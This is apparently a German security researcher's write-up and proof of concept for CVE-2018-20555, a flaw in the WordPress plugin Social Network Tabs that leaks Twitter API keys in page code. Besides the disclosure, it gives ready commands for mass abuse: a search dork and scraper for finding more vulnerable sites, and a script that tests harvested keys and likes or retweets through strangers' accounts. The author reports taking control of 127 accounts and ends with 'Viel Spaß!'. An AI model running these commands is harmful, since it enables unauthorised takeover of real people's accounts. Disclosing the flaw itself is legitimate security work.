
Social Network Tabs Wordpress-Plugin-Sicherheitslücke - CVE-2018-20555
Das WordPress-Plugin namens Social Network Tabs, entwickelt von der Firma Design Chemical, gibt zweimal den Twitter access_token, access_token_secret, consumer_key und consumer_secret seiner Benutzer preis, was zur Übernahme ihres Twitter-Kontos führt.
Dies wird durch die folgenden Codezeilen auf der Seite verursacht, auf der das Twitter-Widget angezeigt wird:
jQuery(document).ready(function ($) {
var config = {
widgets: "twitter,facebook,youtube",
twitterId: "[redacted]",
facebookId: "[redacted]",
youtubeId: "[redacted]",
twitter: {
url: "https://www.rainx.com/wp-content/plugins/social-network-tabs/inc/dcwp_twitter.php?1=%5Breadcted%5D&2=%5Bredacted%5D&3=%5Bredacted%5D&4=%5Bredacted%5D …",
title: "Latest Tweets",
follow: "Follow",
followId: "",
limit: "10",
retweets: true,
replies: true,
images: "thumb",
consumer_key: "[redacted]",
consumer_secret: "[redacted]",
access_token: "[redacted]",
access_token_secret: "[redacted]"
},
}
});
Dank Publicwww konnte ich mit den folgenden Suchanfragen den Twitter access_token, access_token_secret, consumer_key und consumer_secret von 539 verwundbaren Websites abrufen:
Alle Schlüssel sind in twitter_keys.csv verfügbar.
Testen der Twitter-API-Schlüssel in twitter_keys.csv
python test_twitter_api_keys.py -t
Als ich diesen Befehl zum ersten Mal ausführte, erhielt ich die Informationen von 446 Twitter-Konten. Erwähnenswert ist, dass sich 2 verifizierte Konten in der Liste befanden und mehrere Konten mit mehr als 10K+ Followern. Alle verwundbaren Konten sind in vulnerable_accounts.txt.
Liken Sie den Tweet Ihrer Wahl
python test_twitter_api_keys.py -l [tweet_id]
Retweeten Sie den Tweet Ihrer Wahl
python test_twitter_api_keys.py -r [tweet_id]
Als ich diesen Befehl zum ersten Mal ausführte, konnte ich den Tweet meiner Wahl 127 Mal liken, was zeigte, dass 127 Twitter-API-Schlüssel über Lese-/Schreibrechte verfügten, was bedeutete, dass ich aufgrund dieser Schlüssellecks 127 Twitter-Konten übernehmen konnte (Profilbild ändern, liken, retweeten, Bio ändern,...).
Eine Vielzahl von Websites und damit auch Twitter-Konten sind immer noch von diesem Problem betroffen. Um sie zu identifizieren, habe ich einen Scraper erstellt
cd TwitterApiKeysSearchEngine/
scrapy crawl TwitterApiKeysSpider -a keyword="inurl:/inc/dcwp_twitter.php?1=" -a se=google -a pages=10
Die Gesamtzahl der Ergebnisse für diese Google-Suchanfrage beträgt 3550. Unter den ersten 9 Seiten konnte ich 78 Schlüssel abrufen (86%). Viel Spaß!
Folge mir auf Twitter! Einen kleinen Teil meiner Arbeit findest du auch auf https://fs0c131y.com
Die Untersuchung und der POC wurden mit ❤️ von @fs0c131y erstellt.